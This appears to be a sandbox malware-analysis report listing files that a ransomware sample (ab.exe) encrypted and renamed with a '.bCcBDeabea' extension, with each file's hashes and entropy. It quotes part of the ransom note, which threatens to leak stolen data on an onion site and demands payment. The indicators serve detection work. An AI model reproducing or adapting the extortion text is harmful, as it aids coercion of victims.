                        C:\Users\user\Downloads\GAOBCVIQIJ.docx.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978610559494473
                        Encrypted:false
                        Malicious:false
                        C:\Users\user\Downloads\GAOBCVIQIJ.xlsx
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978031235501615
                        Encrypted:false
                        Malicious:false
                        C:\Users\user\Downloads\GAOBCVIQIJ.xlsx.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978031235501615
                        Encrypted:false
                        SSDEEP:192:MPsEQxvOU0Yl+/xHGa5vGqSAXsw6NfrQwXWuR0M4zYhfHV+n:MkEQxGUSxmOeq3cw6BUKRdlg
                        MD5:C372D0A4B87F37DEE3B24F93371B2E8A
                        SHA1:D16C50E04ECA9D489CC2D91F89AC2B03432F9486
                        SHA-256:EEA2ED6501AFF4B5E64EC653106F0EAD10FBC453649CBB05406686C1EB67C735
                        SHA-512:428624F1977A808260271CA7F7EEC049B225AA89D32914089D6A3351FA418E0BE7E813E434FE94139FB21FA7DE08F5E59CAD9F18F918EA5436550689B9A815C9
                        Malicious:false
                        C:\Users\user\Downloads\PALRGUCVEH.png
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.979037354715844
                        Encrypted:false
                        SSDEEP:192:YU03FD5a4nGtdCDADkjML0q0VNdoZMJbQAu312puSR4V+n:YL3FNam8xJ0q0hoZEK1Q
                        MD5:5BEBE15391C7F2C82A017BD71DC7E682
                        SHA1:50306859EFCA8251515B2A67A3D2F1A84F507BDF
                        SHA-256:5DF7E1DBCC30E03F5EB6CE713DCFEEA38DF083E0167699513B26F4E375ACF547
                        SHA-512:A7956C2D0F36414BCF4D336C291D81CE5C1CD55C870E15CED5B18275F3475713BE5638A2F35B869858F35EFC0046395E9B012CC2F50D8FCCFCE2314F78ED1D0B
                        Malicious:false
                        C:\Users\user\Downloads\PALRGUCVEH.png.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.979037354715844
                        Encrypted:false
                        SSDEEP:192:YU03FD5a4nGtdCDADkjML0q0VNdoZMJbQAu312puSR4V+n:YL3FNam8xJ0q0hoZEK1Q
                        MD5:5BEBE15391C7F2C82A017BD71DC7E682
                        SHA1:50306859EFCA8251515B2A67A3D2F1A84F507BDF
                        SHA-256:5DF7E1DBCC30E03F5EB6CE713DCFEEA38DF083E0167699513B26F4E375ACF547
                        SHA-512:A7956C2D0F36414BCF4D336C291D81CE5C1CD55C870E15CED5B18275F3475713BE5638A2F35B869858F35EFC0046395E9B012CC2F50D8FCCFCE2314F78ED1D0B
                        Malicious:false
                        C:\Users\user\Downloads\PWCCAWLGRE.png
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978495227142168
                        Encrypted:false
                        SSDEEP:192:Ko758YBOkjPt9LdPO2PjxhTOU0P9lXYJvvAMKR1ciBW2T2J4opeQmNXlG3V+n:KyYSt9LUOcxnov3au2Fa2XGw
                        MD5:0F5AF6C2F989F19C79FBACD48DB09690
                        SHA1:5F0F1B60FC7E3CDE2C0CD234CF1EB7A03E2E309D
                        SHA-256:BC87DD765A432BE307B3CE10D9C754B409A0B400B9BC4161613455707A4024D8
                        SHA-512:CAC15FC72FACB59DB2B3B26AB19C17C3140D21D2E15BEED42C2A183647BE0E242FE2121D46E8EC9BE937816588FFC7E8CA7FB70B5E873C33F0909A1D3463CDE7
                        Malicious:false
                        C:\Users\user\Downloads\PWCCAWLGRE.png.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978495227142168
                        Encrypted:false
                        SSDEEP:192:Ko758YBOkjPt9LdPO2PjxhTOU0P9lXYJvvAMKR1ciBW2T2J4opeQmNXlG3V+n:KyYSt9LUOcxnov3au2Fa2XGw
                        MD5:0F5AF6C2F989F19C79FBACD48DB09690
                        SHA1:5F0F1B60FC7E3CDE2C0CD234CF1EB7A03E2E309D
                        SHA-256:BC87DD765A432BE307B3CE10D9C754B409A0B400B9BC4161613455707A4024D8
                        SHA-512:CAC15FC72FACB59DB2B3B26AB19C17C3140D21D2E15BEED42C2A183647BE0E242FE2121D46E8EC9BE937816588FFC7E8CA7FB70B5E873C33F0909A1D3463CDE7
                        Malicious:false
                        C:\Users\user\Downloads\QCFWYSKMHA.jpg
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.979950935328355
                        Encrypted:false
                        SSDEEP:192:QV2ed11ibV2/uASP3tWvSp6wB1qt1cfRBVLBVBxSzycwjV+n:Q/oJpkdE61MXVLBV3cz
                        MD5:F6452756A141288E73B5300DF31416C0
                        SHA1:F2166AC2C5F15AB9B21B60D7471E760F743E1453
                        SHA-256:ACA2DB7C8619E327515C875F3F9033B3396C1A0F0AB7EBBB69BB68DE0AAAEACD
                        SHA-512:6C4589535BA3F1C0FD58C60E95D8DE00A4643DED577DB03F731406718BDC5B74A50C53BCE1F89ABA077A84B59465C8B3EB1AF935F10CD4AF04E885C8267027EA
                        Malicious:false
                        C:\Users\user\Downloads\QCFWYSKMHA.jpg.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.979950935328355
                        Encrypted:false
                        SSDEEP:192:QV2ed11ibV2/uASP3tWvSp6wB1qt1cfRBVLBVBxSzycwjV+n:Q/oJpkdE61MXVLBV3cz
                        MD5:F6452756A141288E73B5300DF31416C0
                        SHA1:F2166AC2C5F15AB9B21B60D7471E760F743E1453
                        SHA-256:ACA2DB7C8619E327515C875F3F9033B3396C1A0F0AB7EBBB69BB68DE0AAAEACD
                        SHA-512:6C4589535BA3F1C0FD58C60E95D8DE00A4643DED577DB03F731406718BDC5B74A50C53BCE1F89ABA077A84B59465C8B3EB1AF935F10CD4AF04E885C8267027EA
                        Malicious:false
                        C:\Users\user\Downloads\QCFWYSKMHA.xlsx
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.975784276628111
                        Encrypted:false
                        SSDEEP:192:VEhCXNXKciN7Vtpn3jZpJCpL9LxV8VQI4mkVUfV+n:FdIt1JCpt0VQIxkVUI
                        MD5:FF3F0E3C5DCA7C0BBD30353E663E24B3
                        SHA1:8E4B10BB4FBC58C2E6B370A48D156A01605F69F7
                        SHA-256:1B57159479FA2839DA307F9761E71A03A4A8001C220796EFB79E6F31BE31CC80
                        SHA-512:780D077F06329E5BE8933D4B7CE3ACC72DF69AE8EE3B63E5888C8C72BD5FBF8A45D7AA06459C40B713688885DF04243D49C5E3DB022EA0F3EE227EBD41A4A529
                        Malicious:false
                        C:\Users\user\Downloads\QCFWYSKMHA.xlsx.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.975784276628111
                        Encrypted:false
                        SSDEEP:192:VEhCXNXKciN7Vtpn3jZpJCpL9LxV8VQI4mkVUfV+n:FdIt1JCpt0VQIxkVUI
                        MD5:FF3F0E3C5DCA7C0BBD30353E663E24B3
                        SHA1:8E4B10BB4FBC58C2E6B370A48D156A01605F69F7
                        SHA-256:1B57159479FA2839DA307F9761E71A03A4A8001C220796EFB79E6F31BE31CC80
                        SHA-512:780D077F06329E5BE8933D4B7CE3ACC72DF69AE8EE3B63E5888C8C72BD5FBF8A45D7AA06459C40B713688885DF04243D49C5E3DB022EA0F3EE227EBD41A4A529
                        Malicious:false
                        C:\Users\user\Downloads\QNCYCDFIJJ.docx
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978397096832328
                        Encrypted:false
                        SSDEEP:192:vwUtvlKpg9NGEMWn38QqblqhvZILQ++xKbLV+n:H/9fGUqQ++sbs
                        MD5:7AFC9E8B98EB4DA6B09BF668C3B89718
                        SHA1:6C4674B5DC321A3A7DF4BEEFE9A8D01F65A4DDCD
                        SHA-256:1F56CD6E237083AEC4F39BF56EE22E81D797094471A0C047EAE8AB035D69E906
                        SHA-512:7EF3AC5172B285BEB3EA2B528AC18D1A4F8F11CC5C9C3986C925D21E1C0A6B961CEF8635B0C99A45CAFAAEF54F1992FAADCCD47F0D37C56548C79CE781A594B6
                        Malicious:false
                        C:\Users\user\Downloads\QNCYCDFIJJ.docx.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978397096832328
                        Encrypted:false
                        SSDEEP:192:vwUtvlKpg9NGEMWn38QqblqhvZILQ++xKbLV+n:H/9fGUqQ++sbs
                        MD5:7AFC9E8B98EB4DA6B09BF668C3B89718
                        SHA1:6C4674B5DC321A3A7DF4BEEFE9A8D01F65A4DDCD
                        SHA-256:1F56CD6E237083AEC4F39BF56EE22E81D797094471A0C047EAE8AB035D69E906
                        SHA-512:7EF3AC5172B285BEB3EA2B528AC18D1A4F8F11CC5C9C3986C925D21E1C0A6B961CEF8635B0C99A45CAFAAEF54F1992FAADCCD47F0D37C56548C79CE781A594B6
                        Malicious:false
                        C:\Users\user\Downloads\QNCYCDFIJJ.pdf
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.97611851427635
                        Encrypted:false
                        SSDEEP:192:dY2Ddw2qCMg/dMSiUHc7W71vKIDikJj0G5UngUHBAh0V+n:bDaCMxSiU3JKIDxj0fngbhl
                        MD5:B5FD59306C42AB3491B462F2FC4A1CA8
                        SHA1:62222ACAB376169CDC5E55F35152F52BD9F419C1
                        SHA-256:1970FC26925729D777734F023BBC67C6A20A45ED264A0CF64E5ABA6857E42A28
                        SHA-512:BC774D7A7B971FB60EB50C92AEDAC8F808147CD83144EE763B2A70CA6D665FCA65D320C427F58F26E1FC537593D26093F9FDE95A6FF1578B31AB78E5F8BA58EE
                        Malicious:false
                        C:\Users\user\Downloads\QNCYCDFIJJ.pdf.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.97611851427635
                        Encrypted:false
                        SSDEEP:192:dY2Ddw2qCMg/dMSiUHc7W71vKIDikJj0G5UngUHBAh0V+n:bDaCMxSiU3JKIDxj0fngbhl
                        MD5:B5FD59306C42AB3491B462F2FC4A1CA8
                        SHA1:62222ACAB376169CDC5E55F35152F52BD9F419C1
                        SHA-256:1970FC26925729D777734F023BBC67C6A20A45ED264A0CF64E5ABA6857E42A28
                        SHA-512:BC774D7A7B971FB60EB50C92AEDAC8F808147CD83144EE763B2A70CA6D665FCA65D320C427F58F26E1FC537593D26093F9FDE95A6FF1578B31AB78E5F8BA58EE
                        Malicious:false
                        C:\Users\user\Downloads\SQSJKEBWDT.pdf
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.975993175391259
                        Encrypted:false
                        SSDEEP:192:IcCXrRjsMa9zzpNWODfcBFN+eeEVpr72InELQ25KsyjpJYWHuTlV+n:IrXJeRzIX+eRr0qpxX
                        MD5:E713622688567A9A9D87FF44A8B7AA9B
                        SHA1:67716C709A3C41655402BB122A70624F8D89E9AE
                        SHA-256:E3799BCB9BAD47F40AD0D36A05FCA9707337CF395AEAFB189F6ABA97820CD1C5
                        SHA-512:C692C244BAD551B4362532A1E47628E1154ED411C7DAD2A80497F785CED2CA288D955E08FC88406DA43C593D3324F3AC5317E5073C96DDAA1E20531BEE7DDF86
                        Malicious:false
                        C:\Users\user\Downloads\SQSJKEBWDT.pdf.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.975993175391259
                        Encrypted:false
                        SSDEEP:192:IcCXrRjsMa9zzpNWODfcBFN+eeEVpr72InELQ25KsyjpJYWHuTlV+n:IrXJeRzIX+eRr0qpxX
                        MD5:E713622688567A9A9D87FF44A8B7AA9B
                        SHA1:67716C709A3C41655402BB122A70624F8D89E9AE
                        SHA-256:E3799BCB9BAD47F40AD0D36A05FCA9707337CF395AEAFB189F6ABA97820CD1C5
                        SHA-512:C692C244BAD551B4362532A1E47628E1154ED411C7DAD2A80497F785CED2CA288D955E08FC88406DA43C593D3324F3AC5317E5073C96DDAA1E20531BEE7DDF86
                        Malicious:false
                        C:\Users\user\Downloads\SUAVTZKNFL.mp3
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978511022715781
                        Encrypted:false
                        SSDEEP:192:/778NHhHXfX9ahix/J2mCz8u/kNqyevGB2KDxiMshTFRhxyV+n:/7INBvt8i5MmAs/eOB2KD8MqfhxH
                        MD5:AE709B3F306D4BBC01D6CE5EE20416C1
                        SHA1:6A295E6620A2E9CAEBF7D49D5DB2C4FCD55011F2
                        SHA-256:32E71D175481BCF76D41748F096EF24056EDF88BC22A36A29189D24CB1B67BA0
                        SHA-512:D4647CAAAA529588C02E55A87B538D734C44EFD5A0B981A94B82B47243FCE56079810CE11474DE5D08F133AFD9F73D86D802360FF375D338F2C3419006C5306C
                        Malicious:false
                        C:\Users\user\Downloads\SUAVTZKNFL.mp3.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978511022715781
                        Encrypted:false
                        SSDEEP:192:/778NHhHXfX9ahix/J2mCz8u/kNqyevGB2KDxiMshTFRhxyV+n:/7INBvt8i5MmAs/eOB2KD8MqfhxH
                        MD5:AE709B3F306D4BBC01D6CE5EE20416C1
                        SHA1:6A295E6620A2E9CAEBF7D49D5DB2C4FCD55011F2
                        SHA-256:32E71D175481BCF76D41748F096EF24056EDF88BC22A36A29189D24CB1B67BA0
                        SHA-512:D4647CAAAA529588C02E55A87B538D734C44EFD5A0B981A94B82B47243FCE56079810CE11474DE5D08F133AFD9F73D86D802360FF375D338F2C3419006C5306C
                        Malicious:false
                        C:\Users\user\Downloads\SUAVTZKNFL.pdf
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.980149982104934
                        Encrypted:false
                        SSDEEP:192:4w3ec2WsaWbsvxv5D8Tv8CRzM8lHzref51ajMBiBV+n:4meLWsaWbavIT1ZrezvB9
                        MD5:265577148DB170ECCF291E2B77A82991
                        SHA1:C1806DC3A3FBF3E49393098324FCBB11496F959A
                        SHA-256:B7ADDB669A237B1091FDA5C940C6DC19BA320FC4C626E24EC27B35D6F275850A
                        SHA-512:42F01CEA3E0BB5FBF2BEAA43C6649BA11F27697C19F8F0285A404BFFABDC7E11091D0CAC4BE5CED65F93B7AD2F0C1A744904145E30FBC1FB15D35C2D7C5DFE16
                        Malicious:false
                        C:\Users\user\Downloads\SUAVTZKNFL.pdf.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.980149982104934
                        Encrypted:false
                        SSDEEP:192:4w3ec2WsaWbsvxv5D8Tv8CRzM8lHzref51ajMBiBV+n:4meLWsaWbavIT1ZrezvB9
                        MD5:265577148DB170ECCF291E2B77A82991
                        SHA1:C1806DC3A3FBF3E49393098324FCBB11496F959A
                        SHA-256:B7ADDB669A237B1091FDA5C940C6DC19BA320FC4C626E24EC27B35D6F275850A
                        SHA-512:42F01CEA3E0BB5FBF2BEAA43C6649BA11F27697C19F8F0285A404BFFABDC7E11091D0CAC4BE5CED65F93B7AD2F0C1A744904145E30FBC1FB15D35C2D7C5DFE16
                        Malicious:false
                        C:\Users\user\Downloads\SUAVTZKNFL.xlsx
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978461229780969
                        Encrypted:false
                        SSDEEP:192:pEWl9pWyHn/OvewbGCoYsBwLK7AhosjJBkV2XFjVr/c838V+n:pEW8en/O2wSCK6nhosNuV2XxR/X3d
                        MD5:BD639E1847BE0E3C66EDDF8E4FD81554
                        SHA1:4CFCC1B222162A580863187DBF56F3C27BE6B3F9
                        SHA-256:49D34A499CFB1DBB40D76BAC335470FCAAE2225468376CE8E85CF057AF8A88C2
                        SHA-512:50ECA5D965DCFF40A343E22634D15166975248E6318C25942E59B28D9A918AB1DE119AE0E7939897A902B5D1110E8BC8F10735AC4C7EA3576FC6CF26A5439D5B
                        Malicious:false
                        C:\Users\user\Downloads\SUAVTZKNFL.xlsx.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978461229780969
                        Encrypted:false
                        SSDEEP:192:pEWl9pWyHn/OvewbGCoYsBwLK7AhosjJBkV2XFjVr/c838V+n:pEW8en/O2wSCK6nhosNuV2XxR/X3d
                        MD5:BD639E1847BE0E3C66EDDF8E4FD81554
                        SHA1:4CFCC1B222162A580863187DBF56F3C27BE6B3F9
                        SHA-256:49D34A499CFB1DBB40D76BAC335470FCAAE2225468376CE8E85CF057AF8A88C2
                        SHA-512:50ECA5D965DCFF40A343E22634D15166975248E6318C25942E59B28D9A918AB1DE119AE0E7939897A902B5D1110E8BC8F10735AC4C7EA3576FC6CF26A5439D5B
                        Malicious:false
                        C:\Users\user\Downloads\ZGGKNSUKOP.mp3
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.980127905413415
                        Encrypted:false
                        SSDEEP:192:N7Eb7zUb1L/6q4YcbbzK0rB4JPUGxQg6q0xV3wTV+n:dEb74hL/6q4LrK0tkPFxx6qoek
                        MD5:8247BE52C9E7380FB228591A9E0B2B77
                        SHA1:0566F6BEEEA265102CDBD3CE36483BEEF481AD5F
                        SHA-256:880CAB40B0D3A4CA1DF3C6FD04617652FD35FD6E57816375B8CB02DFBA72240C
                        SHA-512:2CC091B4BD363DCD76D259F7B27FCB279D2EBC252CC2FD1357A8C55208B5A627EEAFD291AE6F5122F7990D809EDB94CB90DC66851A4114CB49B02A643C313C25
                        Malicious:false
                        C:\Users\user\Downloads\ZGGKNSUKOP.mp3.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.980127905413415
                        Encrypted:false
                        SSDEEP:192:N7Eb7zUb1L/6q4YcbbzK0rB4JPUGxQg6q0xV3wTV+n:dEb74hL/6q4LrK0tkPFxx6qoek
                        MD5:8247BE52C9E7380FB228591A9E0B2B77
                        SHA1:0566F6BEEEA265102CDBD3CE36483BEEF481AD5F
                        SHA-256:880CAB40B0D3A4CA1DF3C6FD04617652FD35FD6E57816375B8CB02DFBA72240C
                        SHA-512:2CC091B4BD363DCD76D259F7B27FCB279D2EBC252CC2FD1357A8C55208B5A627EEAFD291AE6F5122F7990D809EDB94CB90DC66851A4114CB49B02A643C313C25
                        Malicious:false
                        C:\Users\user\Downloads\ZQIXMVQGAH.docx
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.980373726806871
                        Encrypted:false
                        SSDEEP:192:A606GeJt5Q5fLv4A1Rz8vHqB8Utr1Exzs6L4jBnObvJB8KkydHYNtuV+n:86GYq98or1ERsavT9m
                        MD5:1A87C32EE742B459C984DB3672507BCE
                        SHA1:4A1F48DA56A1AA28CF0511B29ACBC6F5A81C8B8F
                        SHA-256:A460AEF7AC82E53B0BA31809E659D1302D757783CEA70CBC25C56AF734973684
                        SHA-512:D7670194977D86FB7C15377DACB3231825803247A858D99C4B19D85D2300665240FC3CB5235BBEBC62376957BF64DAAC7D1D1308C23574DCDD4C1BAB052C865C
                        Malicious:false
                        C:\Users\user\Downloads\ZQIXMVQGAH.docx.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.980373726806871
                        Encrypted:false
                        SSDEEP:192:A606GeJt5Q5fLv4A1Rz8vHqB8Utr1Exzs6L4jBnObvJB8KkydHYNtuV+n:86GYq98or1ERsavT9m
                        MD5:1A87C32EE742B459C984DB3672507BCE
                        SHA1:4A1F48DA56A1AA28CF0511B29ACBC6F5A81C8B8F
                        SHA-256:A460AEF7AC82E53B0BA31809E659D1302D757783CEA70CBC25C56AF734973684
                        SHA-512:D7670194977D86FB7C15377DACB3231825803247A858D99C4B19D85D2300665240FC3CB5235BBEBC62376957BF64DAAC7D1D1308C23574DCDD4C1BAB052C865C
                        Malicious:false
                        C:\Users\user\Downloads\uCLrcwQ_readme_.txt
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:ASCII text, with very long lines, with CRLF, CR, LF line terminators
                        Category:dropped
                        Size (bytes):3764
                        Entropy (8bit):5.732028010843027
                        Encrypted:false
                        SSDEEP:48:L9k0ZzV7L/vNbXGZULVDgUp4qNiiE6bm1c0rfWejhAe/YAliM3PXnLHrYxgkH696:L95zhLNbXGZUe7Ka6pU6i9fLrvE69USm
                        MD5:2EA3FE8EC31254F6188FC9828C11979E
                        SHA1:D4B7C5B1CBC9B425786E96CF0266288AD8BE4145
                        SHA-256:67472CEEDB0862BEBE28A632AE0DD382C8DD4A8E754907DB6A74260393C413CD
                        SHA-512:3D2B2C6881677A1FBFA828CA99572F4EDB73218BD4721216C58224CE4B6450631E262D8E087A2B17DB915D05915EA39D73D402E20B3875080DE46BFE7A2D54D5
                        Malicious:false
                        Preview: -------=== Your network has been infected! ===-------.........***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED *****************.........All your documents, photos, databases and other important files have been encrypted and have the extension: .bCcBDeabea......You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files!......The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files!......We have also downloaded a lot of private data from your network....If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info.......You can get more information on our page, which is located in a Tor hidden network..........How to get to our page...----------------------------------------------------------------------------
                        C:\Users\user\Favorites\Amazon.url
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.976985476358939
                        Encrypted:false
                        SSDEEP:192:qg+8bzupi5OATOUbO3B5YsFmqq9gjyDhNtS65axAHhw1GJ+p4V+0:qsmt/tjqiju5Sjg+pm
                        MD5:9D031A46C81367EA13DB0133F910B2ED
                        SHA1:FBDEAE72D6FB31BA14C822FBDC9A95B004CDB3B3
                        SHA-256:64AD87B7D8BA1E8163FF6D48C80867666992F9F29715C772A393C4767F1DA377
                        SHA-512:8969F569DCE7ACBB8909A8F48910DEE95D63A8451D591A9A0C9FE24AD049C1B5046E38E055B2E79EDE848BE94CFB1D77A183750786D1A6D3F68B4F35596B3AB1
                        Malicious:false
                        C:\Users\user\Favorites\Amazon.url.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.976985476358939
                        Encrypted:false
                        SSDEEP:192:qg+8bzupi5OATOUbO3B5YsFmqq9gjyDhNtS65axAHhw1GJ+p4V+0:qsmt/tjqiju5Sjg+pm
                        MD5:9D031A46C81367EA13DB0133F910B2ED
                        SHA1:FBDEAE72D6FB31BA14C822FBDC9A95B004CDB3B3
                        SHA-256:64AD87B7D8BA1E8163FF6D48C80867666992F9F29715C772A393C4767F1DA377
                        SHA-512:8969F569DCE7ACBB8909A8F48910DEE95D63A8451D591A9A0C9FE24AD049C1B5046E38E055B2E79EDE848BE94CFB1D77A183750786D1A6D3F68B4F35596B3AB1
                        Malicious:false
                        C:\Users\user\Favorites\Bing.url
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.976623662474096
                        Encrypted:false
                        SSDEEP:192:UdgZ96E7OaR/lLVkXT2aBjASKaBaUi3Wa17Yiz/xxSAPoRPfVQV+h:U0hxR/x63xAkA35YKwRPfV3
                        MD5:870723AD59751404D1B4F58C1E243511
                        SHA1:6D638F7558066D3895F03D631C0DF0E42E47EFD1
                        SHA-256:8DCFB610927D77F22A10C82936FDCF0F6723C97174E2385F08F6BDC9CE78F5A0
                        SHA-512:F694A900B4FA35D78CE1FE7062C0C52B43267B7CE5A4E7484C24FDE4F6C60FC7A0E504B5693C0789E05F16EBBBB129BAED9F754881AE81ED7AA6EAF6B0D13719
                        Malicious:false
                        C:\Users\user\Favorites\Bing.url.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.976623662474096
                        Encrypted:false
                        SSDEEP:192:UdgZ96E7OaR/lLVkXT2aBjASKaBaUi3Wa17Yiz/xxSAPoRPfVQV+h:U0hxR/x63xAkA35YKwRPfV3
                        MD5:870723AD59751404D1B4F58C1E243511
                        SHA1:6D638F7558066D3895F03D631C0DF0E42E47EFD1
                        SHA-256:8DCFB610927D77F22A10C82936FDCF0F6723C97174E2385F08F6BDC9CE78F5A0
                        SHA-512:F694A900B4FA35D78CE1FE7062C0C52B43267B7CE5A4E7484C24FDE4F6C60FC7A0E504B5693C0789E05F16EBBBB129BAED9F754881AE81ED7AA6EAF6B0D13719
                        Malicious:false
                        C:\Users\user\Favorites\Facebook.url
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9787662806962505
                        Encrypted:false
                        SSDEEP:192:PfygqHlbV2vWFbqpb83mhFHw5WPUi1dv7X+Lvy9aMZaCoJpaPx4DiaV++:XyzHhoeFbEHw5WPhJ+zbMboJwZGi2
                        MD5:AF0239BD4BE04BF8653406CB7FCFDBD9
                        SHA1:EE97E00EA433CE4DB5611801A3F21C23CD67711C
                        SHA-256:C1C5EC86EEA949650878DB504C8E805922D0B02661BFF6E464227206B2F5AE24
                        SHA-512:4D183EEB133CB45B60A6DA6C83B3E67916C354777BB173D359E58BE46B66749E36570C6F48003F959987348B4D6AF3C15049C76AA5ED73AA27910BF9C4CEE39B
                        Malicious:false
                        C:\Users\user\Favorites\Facebook.url.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9787662806962505
                        Encrypted:false
                        SSDEEP:192:PfygqHlbV2vWFbqpb83mhFHw5WPUi1dv7X+Lvy9aMZaCoJpaPx4DiaV++:XyzHhoeFbEHw5WPhJ+zbMboJwZGi2
                        MD5:AF0239BD4BE04BF8653406CB7FCFDBD9
                        SHA1:EE97E00EA433CE4DB5611801A3F21C23CD67711C
                        SHA-256:C1C5EC86EEA949650878DB504C8E805922D0B02661BFF6E464227206B2F5AE24
                        SHA-512:4D183EEB133CB45B60A6DA6C83B3E67916C354777BB173D359E58BE46B66749E36570C6F48003F959987348B4D6AF3C15049C76AA5ED73AA27910BF9C4CEE39B
                        Malicious:false
                        C:\Users\user\Favorites\Google.url
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.980620694862836
                        Encrypted:false
                        SSDEEP:192:R0fQcP/GcaeZpNqhmJc2JMutO8oSeSK0beadj5n1ZLLLS+LvSV+0:RuQcP/7pkOJNeyyax5Ln0
                        MD5:C04CEFB74B1A49E6CCECDAA7C1014479
                        SHA1:6B3BC5186E7A99DE9DD90BEB6ACAD84F9FE1F7D2
                        SHA-256:CF96F1E69D6820E092DFC1E0B95076C373C089A77C4D6DEECE38DF10B49D44F5
                        SHA-512:8AC872AA9B497AD7640A1E4FDF50010DE5A17F9D8FDB82E7D52F2D4ED3655389A307341F39A1D56E0008C2E1917A4EBF9E6A02B0B43D499CA440443146368833
                        Malicious:false
                        C:\Users\user\Favorites\Google.url.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.980620694862836
                        Encrypted:false
                        SSDEEP:192:R0fQcP/GcaeZpNqhmJc2JMutO8oSeSK0beadj5n1ZLLLS+LvSV+0:RuQcP/7pkOJNeyyax5Ln0
                        MD5:C04CEFB74B1A49E6CCECDAA7C1014479
                        SHA1:6B3BC5186E7A99DE9DD90BEB6ACAD84F9FE1F7D2
                        SHA-256:CF96F1E69D6820E092DFC1E0B95076C373C089A77C4D6DEECE38DF10B49D44F5
                        SHA-512:8AC872AA9B497AD7640A1E4FDF50010DE5A17F9D8FDB82E7D52F2D4ED3655389A307341F39A1D56E0008C2E1917A4EBF9E6A02B0B43D499CA440443146368833
                        Malicious:false
                        C:\Users\user\Favorites\Live.url
